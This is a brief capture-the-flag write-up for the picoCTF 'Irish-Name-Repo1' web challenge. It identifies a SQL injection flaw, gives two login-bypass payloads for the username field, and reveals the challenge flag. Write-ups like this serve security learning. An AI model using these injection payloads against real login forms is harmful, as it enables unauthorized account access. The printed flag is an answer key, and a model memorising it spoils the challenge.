Irish-Name-Repo1

Point: 300

Question

There is a website running at https://2019shell1.picoctf.com/problem/37868/ (link) or http://2019shell1.picoctf.com:37868. Do you think you can log us in? Try to see if you can login!

There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?

Try to think about how does the website verify your login?

This is a SQL injection vuln.

Username:       ' OR 'A' = 'A' -- 
or another one: ' OR 1 --

Then click to Login button to see the flag

picoCTF{s0m3_SQL_a57b0b1d}

Last updated 3 years ago